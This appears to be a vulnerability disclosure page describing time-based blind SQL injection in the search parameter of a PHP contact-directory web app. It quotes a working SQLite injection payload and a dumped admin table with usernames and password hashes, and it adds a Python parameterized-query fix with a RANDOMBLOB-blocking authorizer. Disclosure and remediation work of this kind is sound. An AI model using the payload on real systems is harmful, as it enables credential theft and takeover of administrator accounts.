Very High
CVE-nu11-100421
Very High (3 users assessed)
Very High (3 users assessed)
Unknown
Unknown
Unknown
Description
The search parameter of the web app “Local Offices Contact Directories Site” (by oretnom23) appears to be vulnerable to time-based blind SQL injection. An attacker can execute a malicious payload and dump hashed authentication credentials. The attacker can then take control of the system's admin account, steal sensitive information, and destroy the system administrative account.
Technical Analysis
There are ~65K fingerprintable versions of these in the wild
Ratings
Attacker Value: Very High
Exploitability: Very High
Technical Analysis
fool-CVE-nu11-100421
Vendor:
Description:
The search parameter appears to be vulnerable to time-based blind SQL injection attacks, on the web app “Local Offices Contact Directories Site” (by oretnom23).
The malicious attacker can execute a malicious payload and can dump hashed authentication credentials. Then the attacker can take control of the admin account of the system, steal sensitive information, and destroy the system administrative account.
Payload:
---
Parameter: search (GET)
    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245 AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
- dump
Table: admin_list
[2 entries]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 |
| cblake   | cd74fae0a3adf459f73bbf187607ccea |
+----------+----------------------------------+
Reproduce:
Proof:
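An added example, not part of the original assessment or the application's code: it contrasts a concatenated SQLite search query with a parameterized one, and uses a SQLite authorizer to refuse `RANDOMBLOB`, the function the heavy-query payload above relies on for its delay. The `offices` table, the query text and the function names are assumptions, since the page does not show the application's own query.

```python
import sqlite3

# `search` value exactly as quoted in the assessment above.
PAGE_PAYLOAD = ("481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245 AND "
                "4378=LIKE(CHAR(65,66,67,68,69,70,71),"
                "UPPER(HEX(RANDOMBLOB(500000000/2)))))||'")
BLOCKED_FUNCS = {"randomblob"}  # assumption: the search feature never needs it

def open_db():
    """Constructed stand-in database; the app's real schema is not on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE offices (name TEXT)")
    conn.executemany("INSERT INTO offices VALUES (?)",
                     [("Berlin Office",), ("Lyon Office",)])
    seen = []  # SQL functions the engine was asked to compile

    def authorizer(action, arg1, arg2, dbname, source):
        if action == sqlite3.SQLITE_FUNCTION:
            seen.append(arg2.lower())
            if arg2.lower() in BLOCKED_FUNCS:
                return sqlite3.SQLITE_DENY  # statement fails at prepare time
        return sqlite3.SQLITE_OK

    conn.set_authorizer(authorizer)
    return conn, seen

def search_vulnerable(conn, term):
    # "Before": request input is concatenated into the SQL text.
    sql = "SELECT name FROM offices WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]

def search_parameterized(conn, term):
    # "After": input is bound as data and can never become SQL syntax.
    sql = "SELECT name FROM offices WHERE name LIKE '%' || ? || '%'"
    return [row[0] for row in conn.execute(sql, (term,))]

def check(search_fn, term):
    """Return (rows, blocked_by_authorizer, randomblob_reached_sql_engine)."""
    conn, seen = open_db()
    try:
        rows, blocked = search_fn(conn, term), False
    except sqlite3.DatabaseError:
        rows, blocked = [], True
    finally:
        conn.close()
    return rows, blocked, "randomblob" in seen

if __name__ == "__main__":
    for fn in (search_vulnerable, search_parameterized):
        print(fn.__name__, check(fn, PAGE_PAYLOAD))
```

With the concatenated query the payload is compiled as SQL and only the authorizer stops it; with the bound parameter it is an ordinary search string that matches no rows.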
Ratings
Attacker Value: High
Exploitability: Very High
Yeah, and it is horrible.
BR